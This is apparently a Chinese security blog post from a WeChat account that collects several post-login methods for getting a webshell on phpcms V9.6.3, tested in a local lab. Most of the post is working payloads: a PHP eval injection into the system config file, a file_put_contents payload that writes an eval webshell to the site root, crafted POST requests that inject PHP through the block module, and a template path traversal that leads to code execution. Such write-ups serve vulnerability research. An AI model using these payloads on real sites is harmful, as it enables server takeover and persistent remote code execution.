点击蓝字 关注我们
声
明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
原作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经本人允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
正(
水 )文
漏洞环境:
-
Windows 10
-
apache 2.4.39
-
mysql 5.5.29
-
php 5.5.9nts
-
源码之家下载的phpcmsV9.6.3 utf8
注意:以下方法均是在登录后台情况下实现。
方
法
方法一
进入后台->设置->connect
在上图中任意一个框内输入如下代码点击提交即可。
',@@eval($_POST[123]),//
文件路径/caches/configs/system.php
方法二
在用户 > 会员模型管理 > 管理会员模型 >中点击"添加会员模型":
将以下payload存入一个txt文件
array(1);$b=file_put_contents("phpcms_shell3.php",'<?php eval($_REQUEST[1]);?>');
点击确定,这里会报错无视即可。然后就会在根目录下生成phpcms_shell3.php。
方法三
调用block_update需要传入id,所以先插入一条数据来获取id,构造数据包如下
URL:
http://www.phpcmsrsns.com/index.php?m=block&c=block_admin&a=add&pos=1&pc_hash=Lgsnb1
POST:dosubmit=&name=bb&type=2
这边的pc_hash在登录后台时会在url上显示,使用时自行进行替换。
点击跳转,可跳转到block_update方法(包含id)
构造数据包如下记得替换id:
URL:
http://www.phpcmsrsns.com/index.php?m=block&c=block_admin&a=block_update&id=1&pc_hash=Lgsnb1
POST:
dosubmit=&name=bb&type=2&url=&thumb=&desc=&template={php phpinfo();}
然后访问首页点击申请链接
http://www.phpcmsrsns.com/index.php?m=link&c=index&a=register&siteid=1
方法四
可以在本地路径中看到生成的相关文件index.html
phpcms_v9.6.3_UTF8htmlspecial666
进入 内容 > 内容相关设置 > 管理栏目 >
添加单网页-基本选项&模板设置
在模板设置处,使用浏览器自带的Developer Tools(F12)对元素属性值进行修改,如下图所示
或者,在此处使用BurpSuite拦截数据包,对数据包中setting[page_template]值进行修改setting[page_template]=../../../../html/special/666/index
然后,更新栏目,在管理栏目处可看到
点击刚刚添加的单网页访问链接,发现phpinfo();已经执行成功
http://www.phpcmsrsns.com/index.php?m=content&c=index&a=lists&catid=6
可以在本地路径中看到之前生成的专题文件index.html,新生成了index.php。
直接访问是没有权限。
不明真相方法五
吐司版主的方法,测试了一下直接系统蹦了完全没办法用了。我不知道是不是太菜了操作不到位。有知道的表哥可以留言指点一下。
网上还有很多未公开的漏洞也可以getshell,部分还有公开的我没看懂有兴趣的同学请看下方的参考链接。等我把php的代码审计学完再慢慢研究了。先水一篇再说。
参考链接
https://www.baidu.com
http://jnn6.com/jingyan/68.html
https://www.t00ls.net/thread-54514-1-1.html
https://www.freebuf.com/articles/web/195737.html
https://zhuanlan.zhihu.com/p/60027711
Forest Team
微信号|ForestTeam
期待你的
分享
点赞
在看
本文始发于微信公众号(Forest Team):phpcmsv9.6.3后台getshell漏洞整理
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论